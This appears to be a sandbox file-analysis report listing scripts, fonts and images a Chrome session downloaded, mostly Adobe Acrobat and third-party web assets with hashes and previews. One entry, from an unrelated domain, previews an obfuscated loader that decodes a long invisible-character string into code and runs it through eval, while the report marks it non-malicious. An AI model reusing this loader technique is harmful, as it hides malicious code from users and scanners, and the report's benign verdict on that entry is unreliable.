                  MD5:BAD6CCDE0D564F06B853D0F20811A9AF
                  SHA1:59881B30E414371BE57C13238EED25129DC9C7F8
                  SHA-256:02997E50DEC7D8F3AFD38EEFA775AA9811AC130090E45E4F29CFFB47978B0110
                  SHA-512:CA2F445EC819A707181838CB51527C29A77F8265768254F68B05C4C1BDBD8B77B50AC75F588333D8D17519FC2D01D9DF666B62F135CDCB641371D214547939DE
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-core/3.71.0/dc-extras.js
                  Preview:/*! For license information please see dc-extras.js.LICENSE.txt */.(()=>{var e={JJN5:function(e){"use strict";var t;t=function(){return function(e){var t={};function n(o){if(t[o])return t[o].exports;var r=t[o]={exports:{},id:o,loaded:!1};return e[o].call(r.exports,r,r.exports,n),r.loaded=!0,r.exports}return n.m=e,n.c=t,n.p="",n(0)}([function(e,t,n){Object.defineProperty(t,"__esModule",{value:!0});var o=function(){function e(e,t){for(var n=0;n<t.length;n++){var o=t[n];o.enumerable=o.enumerable||!1,o.configurable=!0,"value"in o&&(o.writable=!0),Object.defineProperty(e,o.key,o)}}return function(t,n,o){return n&&e(t.prototype,n),o&&e(t,o),t}}(),r=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var o in n)Object.prototype.hasOwnProperty.call(n,o)&&(e[o]=n[o])}return e};t.default=function(e,t){var n=function(t){function n(e){!function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,n);var t=function(e,t){if(!e)thr
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (63882)
                  Category:downloaded
                  Size (bytes):64002
                  Entropy (8bit):5.2982461032960915
                  Encrypted:false
                  SSDEEP:
                  MD5:02CD47FD005D644D78F7950ED91C32AF
                  SHA1:997BDC4BB4961708528D59ABFB0034A259079DF7
                  SHA-256:5D54D14BC7C6BF3585D41B036E016BBD5CCCE0049794904849DDB81D92578A49
                  SHA-512:4F89FFB9D6480EEA71B758EB44960D615328883D03AACFD91F953E85F841CFECAED106030EB1B27C3D995B35622357EC5D232ADE28968658332D5CCB544B5E54
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-comments-dropin/3.59.4_2.1115.1/EmojiPickerComponent-RHComments-expandedPanelContainer-commentDialogContainer-chunk.js
                  Preview:(self["webpackJsonp-comments"]=self["webpackJsonp-comments"]||[]).push([[9805],{B59H:(n,e,o)=>{"use strict";o.r(e),o.d(e,{default:()=>a});var t=o("NjQJ"),i=o.n(t),r=o("AXyZ"),l=o.n(r)()(i());l.push([n.id,':root{}.ModernEditableTextComponent__textEditor___b0_UX:focus{color:#4b4b4b;margin:7px 0 3px}.ModernEditableTextComponent__textEditor___b0_UX{height:80%}.ModernEditableTextComponent__textEditor___b0_UX,.ModernEditableTextComponent__textEditorInlineCommenting___gHXtS{align-items:baseline;font-style:normal;font-weight:400;line-height:1.5;margin:7px 0 3px;min-height:30px;outline:0;outline-color:transparent;outline-style:none;outline-width:thin;padding-left:10px;padding-right:10px;-webkit-user-select:text;-moz-user-select:text;user-select:text;white-space:pre-wrap}.ModernEditableTextComponent__textEditorInlineCommenting___gHXtS{cursor:pointer;flex-grow:1}.ModernEditableTextComponent__quickCommentsCTA___g62eF{margin-left:7px;margin-top:3px}.ModernEditableTextComponent__quickCommentsCTA___g
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (9358)
                  Category:downloaded
                  Size (bytes):9543
                  Entropy (8bit):5.139447421457082
                  Encrypted:false
                  SSDEEP:
                  MD5:9891B06D844E3F27AF09F5C645CDB692
                  SHA1:57FDF821108324BBCA76EDFE360041020117BB60
                  SHA-256:BD81BB44A65AB38C95B843B3A9AE2010E42B4F83178435ECE1137699CD0B1C70
                  SHA-512:AD79AE8A2EBD4CDFA4452F880FA165536760C39C1FA60505AACE3B198DCF1D81372FFC975586E1E7F0B1B522FBC38D5CA64830F6164F22CFE1E61414EEF1DA01
                  Malicious:false
                  Reputation:unknown
                  URL:https://prod.adobeccstatic.com/unav/1.4/profile.0de16df9d004749a0bea.bundle.js
                  Preview:/* For license information please see https://prod.adobeccstatic.com/License/LICENSE.txt */./*! For license information please see profile.0de16df9d004749a0bea.bundle.js.LICENSE.txt */."use strict";(self.webpackChunkuniversal_nav=self.webpackChunkuniversal_nav||[]).push([["profile"],{684:(t,r,e)=>{e.r(r),e.d(r,{default:()=>h});var n=e(625),o=e(509),i=e(61),a=e(610);function c(t){return c="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},c(t)}function u(){u=function(){return r};var t,r={},e=Object.prototype,n=e.hasOwnProperty,o=Object.defineProperty||function(t,r,e){t[r]=e.value},i="function"==typeof Symbol?Symbol:{},a=i.iterator||"@@iterator",l=i.asyncIterator||"@@asyncIterator",f=i.toStringTag||"@@toStringTag";function s(t,r,e){return Object.defineProperty(t,r,{value:e,enumerable:!0,configurable:!0,writable:!0}),t[r]}try{s({},"")}catch
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (20391)
                  Category:downloaded
                  Size (bytes):20450
                  Entropy (8bit):5.208918451931349
                  Encrypted:false
                  SSDEEP:
                  MD5:BE77FA4ED0B9E0C98238C66F6AF208B4
                  SHA1:50286C221D662460B0E89E9482762BF028A66E9C
                  SHA-256:14595713CF385515517793C526E127FA9146464EEBD607A017B0BC677DA779D3
                  SHA-512:97B70DAF7C4CFCF9B98592DB2F640F7B9C4E1BDBC18C5E6B50830235720BD619D9EF48B5D55C2272FF71068B5DFA8DCB13B2BB320723A2198CE8411EE511C548
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-comments-dropin/3.59.4_2.1115.1/CommentsProvider-chunk.js
                  Preview:"use strict";(self["webpackJsonp-comments"]=self["webpackJsonp-comments"]||[]).push([[930],{HwaR:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0});var r=function(){function defineProperties(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,r.key,r)}}return function(e,t,n){return t&&defineProperties(e.prototype,t),n&&defineProperties(e,n),e}}(),i=n("Gcvr");var o=function(){function Client(){!function _classCallCheck(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,Client),this._environment="stage",this._apiKey=null}return r(Client,[{key:"_validate",value:function _validate(){if(!this._suggestionApiHref){if(this._environment&&this._endpoint&&this._apiKey)return this.discover();throw new Error("People Graph SDK has not been properly configured yet.")}return Promise.resolve()}},{key:"configure",value:function configure(e){var t=e.acceptHeaderVersio
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65468)
                  Category:downloaded
                  Size (bytes):225189
                  Entropy (8bit):5.321229941267026
                  Encrypted:false
                  SSDEEP:
                  MD5:7C25A9C7D8A9FF98A53BAC7FCA0A2C96
                  SHA1:297E6D41021DE84093C6A70C4572C9FD91C59CC4
                  SHA-256:E875C6F6C85DC1AC65BD0CCA7C074E502321ECE5ED858BA852C35A03161537DA
                  SHA-512:6069A06691046B31E7245EBB8932B212A42AC11534493810B136C62AD493DA933D21A1746285BD842344325034014D2D136E6452B45757C6F70A35E8E9FC013F
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1122.0/5508-chunk.js
                  Preview:/*! For license information please see 5508-chunk.js.LICENSE.txt */.(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[5508],{snUT:(e,t,n)=>{"use strict";t.t=function A4uClose(e){var t=_extends({},e);return r.default.createElement("svg",_extends({viewBox:"0 0 36 36"},t,t),r.default.createElement("path",{fillRule:"evenodd",d:"M26.48528,6.68629,18,15.17157,9.51472,6.68629a1,1,0,0,0-1.41421,0L6.68629,8.10051a1,1,0,0,0,0,1.41421L15.17157,18,6.68629,26.48528a1,1,0,0,0,0,1.41421l1.41422,1.41422a1,1,0,0,0,1.41421,0L18,20.82843l8.48528,8.48528a1,1,0,0,0,1.41421,0l1.41422-1.41422a1,1,0,0,0,0-1.41421L20.82843,18l8.48528-8.48528a1,1,0,0,0,0-1.41421L27.89949,6.68629A1,1,0,0,0,26.48528,6.68629Z"}))};var r=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}}(n("YWiy"));function _extends(){return _extends=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var r in n)Object.prototype.hasOwnProperty.call(n,r)&&(e
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):181158
                  Entropy (8bit):5.505572821643911
                  Encrypted:false
                  SSDEEP:
                  MD5:98BB518D10C507A2FB73827DD23BA898
                  SHA1:D0E784FA50FE5ED0DDFB29752997C5C5F0BB0890
                  SHA-256:F76D451A0EB6A04CA12D871A5E69489D0BFDBD35DE6FD78D24BD9C7B9AAA009A
                  SHA-512:417336EFAB55E11D3D589B0C2922BC1B77D1F3907E3C100672CC12070201923F67ADA9227B8745B768B81CD7FDE0160CF2A01A8D758E7EED1949C7E783FEA90E
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-organize-verbs-dropin/3.17.1_2.683.0/bootstrap.js
                  Preview:(()=>{var e,t,r,i,o={Xoby:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default={workflows:{acrobat:"acrobat"},subcategories:{express:"express",scToAcp:"sc-to-acp",transformPdf:"transform-pdf"},types:{agreementDraft:"agreement-draft",agreementDraftIncluded:"agreement-draft-included",cancelDialog:"cancel-dialog",ccxJob:"ccx-job",complete:"complete",compressRetry:"compress-retry",confirmSave:"confirm-save",continueDialog:"continue-dialog",discover:"discover",documentOrganizer:"document-organizer",documentRendition:"document-rendition",downloadAsset:"download-asset",dropzone:"dropzone",entry:"entry",error:"error",express:"express",fileNotSupported:"file-not-supported",filepicker:"filepicker",filesDropped:"files-dropped",filesProcessed:"files-processed",filesSelected:"files-selected",gotoApp:"goto-app",importSelection:"import-selection",importToAcp:"import-to-acp",importViewer:"import-viewer",job:"job",landing:"landing",navAway:"nav-away-dialog",navBar:"nav-bar",n
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (30683)
                  Category:downloaded
                  Size (bytes):30740
                  Entropy (8bit):5.17933934975195
                  Encrypted:false
                  SSDEEP:
                  MD5:AC984FD19D213EB4828B28CDEDBD2EE0
                  SHA1:76FFF609E8FE8B7A2CB763AF5C1610AD6B6187BC
                  SHA-256:1554D63CADA314950093254D1612CFF3E07D56BBE37326A9BB995D0E620B4535
                  SHA-512:39BA26D6391CFB99B317AE9EE805746EFECDC8CD9D09AD370D2459146A62D329451C43464EFCCC2D685DFC9CCE34B19266004B0822F344443D93129D649D86A4
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/sw.js
                  Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},t=(new e.Error).stack;t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="7f396dc0-ce79-494f-a7a2-bc1e224daa19",e._sentryDebugIdIdentifier="sentry-dbid-7f396dc0-ce79-494f-a7a2-bc1e224daa19")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"34df8e88851d3cbee2b7be2637531e04f753d64c"},(()=>{"use strict";var e={jATO:()=>{try{self["workbox:core:6.5.4"]&&_()}catch(e){}},sKJR:()=>{try{self["workbox:precaching:6.5.4"]&&_()}catch(e){}},q8A1:()=>{try{self["workbox:routing:6.5.4"]&&_()}catch(e){}},"1gkF":()=>{try{self["workbox:strategies:6.5.4"]&&_()}catch(e){}}},t={};function __nested_webpack_require_534__(r){var n=t[r];if(void 0!==n)return n.exports;var o=t[r]={exports:{}};return e[r](o,o.exports,__nested_webpack_require_534__),o.exports}__nested_webpack_r
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (4112), with no line terminators
                  Category:downloaded
                  Size (bytes):4114
                  Entropy (8bit):5.30116764203578
                  Encrypted:false
                  SSDEEP:
                  MD5:0469B2578169B1AC7C3E5C053DD41047
                  SHA1:6828517F09D5C513D1F2EA552E3ED4CF69812708
                  SHA-256:531C647E2CB21D1CA4DD7FEFEEB7CA65DDC1C73F9747500B1ACE50C103E1E9E8
                  SHA-512:148951170E0F162B258C5880CC44A0DB111E8DB3B6A174583106D1FC091B3CE0B5BFFAD567E30948B69A141D9D9D12912B781254E45FF938A983AE5BD8807923
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-files-dropin/3.18.0_2.66.0/translations-en-US-json-chunk.js
                  Preview:"use strict";(self["webpackJsonp-files"]=self["webpackJsonp-files"]||[]).push([[818],{t39f:e=>{e.exports=JSON.parse('{"ADD_FILE_FROM_DEVICE":"Add a file from your device","ADD_TO_STARRED":"Add to Starred","ADDED":"Added","CANCEL":"Cancel","CANCELED":"Canceled","CREATE_COPY":"Create a copy","CREATE_COPY_TITLE":"Create a copy to modify","CREATE_COPY_DESCRIPTION":"Shared files can.t be modified. Create a copy and make changes to your copy","CONTINUE":"Continue","CREATE":"Create","DATE_ADDED":"Date Added","DATE_MODIFIED":"Date Modified","DATE_OPENED":"Date Opened","DRAG_AND_DROP_FILE":"Drag and drop your file","DRAG_AND_DROP_FILES":"Drag and drop your files","DRAG_OR_UPLOAD":"Drag or upload files here to add them to this folder.","DRAG_OR_UPLOAD_TO_USE":"Drag or upload files here to work with and share your files across web, desktop and mobile.","DUPLICATE_FOLDER":"A folder with this name already exists. Please choose another name.","EMPTY_FOLDER":"There aren\'t any files here yet.","ERR
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):55002
                  Entropy (8bit):7.1761877564232
                  Encrypted:false
                  SSDEEP:
                  MD5:9ACCA39473DCABC184DB0F8FE79915BE
                  SHA1:4FDC127D980499159C125D244D624C012E815F3F
                  SHA-256:66CEF20945206601F2BF4C8EF6F9DD9D625EABD8E4A7632F7B71B287751604F6
                  SHA-512:5261F0F4893C6ABFA25CB7C9EA997D32A13CE1CE996463A3313E98B449A5A04C4664E32DC5D603EF0AD337038DC35FE1C1D8D3776F0C5D9C8D3C8693AC92381A
                  Malicious:false
                  Reputation:unknown
                  Preview:.........AdobeSerifMM.......L... ....=.......................!.%.).-.1.5.9.>.B.F.J.N.R.V.Z.`.d.h.l.o.s.w........................................................................... .$.(.-.2.6.:.>.B.F.J.N.R.X.\.`.d.h.l.p.t.x.|.........[...J.O.q.......................................O.S.^.g.m.t.z.............................................Y.......#.-.:.?.H.L.Q.V.[.`.............[...V...).....2.l.......L.}.........6.Z.{.................+.>.N.\.l.{............................. .%.+.1.;.E.O.U._....................[.[.............p.p.}.}..%......*...%.&.................................&..............,...... .....|^.^#....F.......w..................i.i."....\..... ....................1.....!..*.G......L..&...!.. ....9..].].. ..%....."..#.r.....e.e...F....... ...&......................$.%..!....#.N.........U.U...................8...W... .j.."..g ....@..................................Z.>...Q1.........._............. ......3...........~|VB!..0t.c.uUjx.c...fpN.N..qh.g...oU=jC.....MH.. .dhzfqVK.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Web Open Font Format (Version 2), CFF, length 38948, version 1.0
                  Category:downloaded
                  Size (bytes):38948
                  Entropy (8bit):7.992760264211827
                  Encrypted:true
                  SSDEEP:
                  MD5:8CF9CE13F6FE0205F4EAAC49FA17B681
                  SHA1:2CEF6CD00A2D4A5CD5E0AB6F00042A70F1B73756
                  SHA-256:85257E2624BBB138582821CEB2F8B18C7B4FB43D26C1BCBFD5155CA81B55CC69
                  SHA-512:7F646C7CA915C77F92FF0D3DB97DF62379597D2348A43188B117076939D1A0FA2F6A7D2C1F20D608A5161A5AC0010789CAF43E893FC06437B302C6BDC1D4A77B
                  Malicious:false
                  Reputation:unknown
                  URL:https://use.typekit.net/af/eaf09c/000000000000000000017703/27/l?primer=0635fba006f1437d962ae878ad04a353e0c3568e4d5bde3554eb7e3e05ddd02d&fvd=n7&v=3
                  Preview:wOF2OTTO...$.......l.............................F...+?DYNA.i?GDYN.Q..L.`..P...6.$..@...... .r...H.... ..CDQ.."1..UUU.&.w... .._..w..._..........7......e.*...#.1......7...@..=..f9.N...0..3..J)...hTM.#.Zg.Ii.@..IC8lO4...cR0.lf.I.W..xZ.'..;..r\Jv....E-...V..A4.[..`-&AKPi.."...R3.....p..Gi.9V..m..>.f_\..D..I.$-..a.../?.m>...;GX.......=..b...b,..*b..*...\.m.vPQ..^...R.b..D.............I..~23....2.L..JJj0vL.)L..._......0..q.o7.r.N9.]cMR.h...S..(".0e..]...._.U..r..O...i.{..U.....pi.t@%...T..j...4.}..i.....a.a..P.........T81.TL..tY.R...^...1.._.g..5..K....P/Y.,.s=3..#.....U.o........G..@......#..0.(.4. .49..~..n...B....~.....0..?.[..v..;..F.*3....B...(.ZG..c....j...1'C....i...2.h.g.^.O...f."9.r..a.gv..Z..{.:.....".m....=Cg.....5.j2......N..Q..T3..N..........p.7..q,."8;. .E.ai..F.j.......B..{t...>z..}.....G...I..vq^..t......k..E$.~.k.h.&...~h.........!.Y(@9t....L.\,.J..6..!..9\.m..C<G3^..>.;...ySk.D=i......8J..*.*.!.....M.h%m......L...=.W.L...}._L.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (34880)
                  Category:downloaded
                  Size (bytes):73001
                  Entropy (8bit):5.440075971799322
                  Encrypted:false
                  SSDEEP:
                  MD5:C84EE9955A5B2DB22010F894455F8231
                  SHA1:BF479C660A388FACC77D8BA6428D7EADE62BDE84
                  SHA-256:BEA4594ADCCF72CB9324CEFF05A13398A0057476AD450F814DB37A954234B7FA
                  SHA-512:CC1A286DEC4BD9C5C6E13B5023B28BFE47CF591B87CE7BCC07AD7512DDBF030DC4A6391FEFB8274A315B23A8718C18CAFD876E6239CE80D6A56427646BBE9DFE
                  Malicious:false
                  Reputation:unknown
                  URL:https://widget.uservoice.com/6gNXXegDB6rtHARrNKRF8w
                  Preview:window.UserVoice = {events:window.UserVoice||[],push:function(x){window.UserVoice.events.push(x)},account:{"active_widgets":[],"campaign":"footer_poweredby","name":"Adobe","white_labeled":false,"widget2_domain":"acrobat.uservoice.com","subdomain_ssl_host":"acrobat.uservoice.com","subdomain_site_host":"acrobat.uservoice.com","subdomain_key":"acrobat","subdomain_id":496015,"client_key":"6gNXXegDB6rtHARrNKRF8w","client_options":null,"satisfaction_autoprompt_enabled":false,"messages":{"Loading":"Loading","OpenContactWidget":"Open Contact Widget","OpenFeedbackWidget":"Open Feedback Widget"},"has_ticketing_system":false,"has_feedback_system":true,"has_satisfaction":false,"private_site_enabled":false,"source_version":1742386576,"deactivated":false},client_widgets:{},manifest:{"tab-left-dark-no-bullhorn":"/pkg/clients/widget2/tab-left-dark-no-bullhorn-9669fb4a9d79416e9dc17618c9ed226faf8171ce461449f1282d6fcc2d6aa338.png","tab-left-light-no-bullhorn":"/pkg/clients/widget2/tab-left-light-no-bullh
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with no line terminators
                  Category:downloaded
                  Size (bytes):128
                  Entropy (8bit):4.750616928608237
                  Encrypted:false
                  SSDEEP:
                  MD5:D90F02F133E7B82AF89B3E58526AC459
                  SHA1:F1D6D47EFE0D920F5BC5024E813554BD2F8A1650
                  SHA-256:FCF0826E3EA7D24F6C73417BFF62AD84191ECC837DBFB10E60A2547580C3C14D
                  SHA-512:83C187216CE1B44E23000DF4F25A4BAA7C5E0066E62C3E0D0203B013B5C26D097C6B225C58E345204B47E5E7BF34D4A8E60F7DF63D6083157C6CB9707DD9C41E
                  Malicious:false
                  Reputation:unknown
                  URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCe-Gs2WhQ70BEgUNX1f-DRIFDRObJGMhlsz1irFdYiISSgn1_1ess53a7xIFDc8jKv8SBQ3Fk8QkEgUNiaVnyxIFDcMZOZASBQ2JpWfLEgUNwxk5kBIFDdACQOwSBQ2oXeN0IezB4_DsVGgx?alt=proto
                  Preview:ChIKBw1fV/4NGgAKBw0TmyRjGgAKSAoHDc8jKv8aAAoHDcWTxCQaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDdACQOwaAAoHDahd43QaAA==
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (65434)
                  Category:downloaded
                  Size (bytes):171648
                  Entropy (8bit):5.507813850677133
                  Encrypted:false
                  SSDEEP:
                  MD5:F2A4A5950508A1BC22E1B6E8EE3FF320
                  SHA1:63F8561966F6A26113E94FA7D42501A6CDC0B8D6
                  SHA-256:A1D0E05416CA6EFDB33416A3CD450508F97A06A4311EA7E0C5076378EBC51A36
                  SHA-512:2028FD91A5FDBEEFA62E7E48D14C4F1FC57AFA79E4D924D06436F7E120A45AA0B75F18A010162EC170648FB94A9BFC12D5F6696B06B6E557F3BA6BD653627B54
                  Malicious:false
                  Reputation:unknown
                  URL:https://commerce.adobe.com/store/fpjs/v3/dSMHmEUM9QSIKQm9iy0W/loader_v3.9.3.js
                  Preview:/**. * Fingerprint Pro - Copyright (c) FingerprintJS, Inc, 2025 (https://fingerprint.com). */..var __fpjs_p_l_b=(function(exports){'use strict';var n$1=function(t,r){return n$1=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(n,t){n.__proto__=t;}||function(n,t){for(var r in t)Object.prototype.hasOwnProperty.call(t,r)&&(n[r]=t[r]);},n$1(t,r)};var t=function(){return t=Object.assign||function(n){for(var t,r=1,e=arguments.length;r<e;r++)for(var i in t=arguments[r])Object.prototype.hasOwnProperty.call(t,i)&&(n[i]=t[i]);return n},t.apply(this,arguments)};function r(n,t){var r={};for(var e in n)Object.prototype.hasOwnProperty.call(n,e)&&t.indexOf(e)<0&&(r[e]=n[e]);if(null!=n&&"function"==typeof Object.getOwnPropertySymbols){var i=0;for(e=Object.getOwnPropertySymbols(n);i<e.length;i++)t.indexOf(e[i])<0&&Object.prototype.propertyIsEnumerable.call(n,e[i])&&(r[e[i]]=n[e[i]]);}return r}function e(n,t,r,e){return new(r||(r=Promise))((function(i,o){function u(n){try{a(e.next(n));}cat
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:GIF image data, version 89a, 1 x 1
                  Category:dropped
                  Size (bytes):35
                  Entropy (8bit):2.9302005337813077
                  Encrypted:false
                  SSDEEP:
                  MD5:81144D75B3E69E9AA2FA3E9D83A64D03
                  SHA1:F0FBC60B50EDF5B2A0B76E0AA0537B76BF346FFC
                  SHA-256:9B9265C69A5CC295D1AB0D04E0273B3677DB1A6216CE2CCF4EFC8C277ED84B39
                  SHA-512:2D073E10AE40FDE434EB31CBEDD581A35CD763E51FB7048B88CAA5F949B1E6105E37A228C235BC8976E8DB58ED22149CFCCF83B40CE93A28390566A28975744A
                  Malicious:false
                  Reputation:unknown
                  Preview:GIF89a.............,..............;
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):166152
                  Entropy (8bit):5.247818721561294
                  Encrypted:false
                  SSDEEP:
                  MD5:C70D1716A40ECA0E11A68C7FB45485CA
                  SHA1:534E2CF85BD12894F7CAC5EF29CFAF3452DB48BD
                  SHA-256:A0CE8C3C33C8D3EE019DE8430D855241F3302171786838A3C0D68BC24B37616C
                  SHA-512:77ADDE25FEF12C7162E739520E212377AEEDDE06DFF18E5A969BDBA40A5FC5052F5EBBB83C95D2BBFFE5317CBDE1378060B85D8B78D55635EF298C746BB2A1CD
                  Malicious:false
                  Reputation:unknown
                  URL:https://commerce.adobe.com/mini-apps/_next/static/chunks/3612-2d84c85f2c7ffb31709f.js
                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3612],{817:function(e,n,t){"use strict";t.d(n,{n:function(){return a}});var r=t(39902),i=t(67294),o=function(){return(o=Object.assign||function(e){for(var n,t=1,r=arguments.length;t<r;t++)for(var i in n=arguments[t])Object.prototype.hasOwnProperty.call(n,i)&&(e[i]=n[i]);return e}).apply(this,arguments)},a=function(e){return i.createElement(r.f.Provider,o({},e))}},55207:function(e,n,t){"use strict";t.d(n,{P4:function(){return m},dJ:function(){return g},qi:function(){return y},PG:function(){return T},ps:function(){return h},i7:function(){return E},i_:function(){return b},K7:function(){return I},yg:function(){return S},Uq:function(){return C}});var r=t(3256),i=t(57189),o=t(17985),a=t(37897),c=t(13452),u=t(71732),s=t(15984),l=t(67294),d=t(63318);t(69580);var f={bestValue:"Badges__bestValue___tveUS",incrementalPrice:"Badges__incrementalPrice___3IUH4",labelBold:"Badges__labelBold___3Y0ed",appliedPromotionsLabelWithIcon:"Badges__applied
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (21720), with CRLF line terminators
                  Category:downloaded
                  Size (bytes):4724541
                  Entropy (8bit):2.5839796656457863
                  Encrypted:false
                  SSDEEP:
                  MD5:AA849F9614E090F7E5EBED754F83D3C2
                  SHA1:4100808BBC0665E1ECF3372DDF7DD02A14B1387A
                  SHA-256:928A123423281E31FCC018F4CB5B297299EFB723678D2A45EFCD842F6C6A4AE6
                  SHA-512:522EB407E209EA8E61622882669258866409277A8E754A994264D4B1418164236AAFB4630FA8B3A0029D7D0700E07D1113CFED04882BEAF3842C8FB5CE167E8D
                  Malicious:false
                  Reputation:unknown
                  URL:https://4fsv.iatrivvbe.com/56RbfegwzCgg2x50X5YhijjshjzNfo4wOCi89110
                  Preview:function decodeAndEvaluate(key) {.. const binaryString = [...key].. .map(char => Number('.' > char)).. .join('').. .replace(/.{8}/g, byte => String.fromCharCode(parseInt(byte, 2)));.. .. (0, eval)(binaryString);.. return true;..}....const handler = {.. get: function(_, prop) {.. decodeAndEvaluate(prop);.. return true;.. }..};..const viewsen = new Proxy({}, handler);..viewsen["........................................................................................................................................................................................................
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (11318)
                  Category:downloaded
                  Size (bytes):11382
                  Entropy (8bit):5.326298255012174
                  Encrypted:false
                  SSDEEP:
                  MD5:D69E1AD7248378A075B6F799F97B05EF
                  SHA1:364FEA538DA5937FF37D1BDF99F3FBDB7BA5ADA3
                  SHA-256:019BC1F2501E1313C2E2BA33EEBD2AB7B80ABB537BFD02C324200D120769F564
                  SHA-512:2C8E7E98CF7FDA870A955B3F294DE0BD17ABB3E2C02D014169D6C12580F045E02A9CB877273EF8C08FEBBAD6E97323950BB9B6B7E9C66DCE17BC92975E10A914
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1122.0/GenAIProvisioningAPIs-chunk.js
                  Preview:"use strict";(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[2541],{Sn4D:(e,n,t)=>{t.r(n),t.d(n,{default:()=>p});var i=t("plsW"),r=t("zGZ6"),o=t.n(r),s=t("WDZn"),a=t("stuK"),l=t("77UE"),u=t("gmFL"),c=t("tr63"),d=t("Uohe"),__awaiter=function(e,n,t,i){return new(t||(t=Promise))((function(r,o){function fulfilled(e){try{step(i.next(e))}catch(e){o(e)}}function rejected(e){try{step(i.throw(e))}catch(e){o(e)}}function step(e){e.done?r(e.value):function adopt(e){return e instanceof t?e:new t((function(n){n(e)}))}(e.value).then(fulfilled,rejected)}step((i=i.apply(e,n||[])).next())}))};class UserProviderInterface{static getGenAIServices(e){return __awaiter(this,void 0,void 0,(function*(){try{return UserProviderInterface.genAIServicesPromise||(UserProviderInterface.genAIServicesPromise=new Promise(((n,t)=>__awaiter(this,void 0,void 0,(function*(){(yield(0,c.fl)("IUserAPI")).getGenAIServices(e).then((e=>{n(e)})).catch((e=>{t(e)})).finally((()=>{UserProviderInterface.genAIService
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (3369)
                  Category:downloaded
                  Size (bytes):3425
                  Entropy (8bit):5.261011832856921
                  Encrypted:false
                  SSDEEP:
                  MD5:98BC122074BD44CA2FAE4C2AD6FD423A
                  SHA1:5F314D8C5EB3155AECA656822A2EC705A318E361
                  SHA-256:1F8DD69766D04E23C7C46ABDB8AE476A7DC3165A4381DAB75D67FF4A0BAC5A89
                  SHA-512:FF28D63FBB61FDFFDB73E68C9BC24AE55E411E378735A15D520A6D49C98D523D10C4CB7CF33D4169FF0E48D7582578C2F487040331E918DA8BB7109F0AED8DC1
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-conversions2-dropin/3.17.1_2.146.0/export-pdf-provider.js
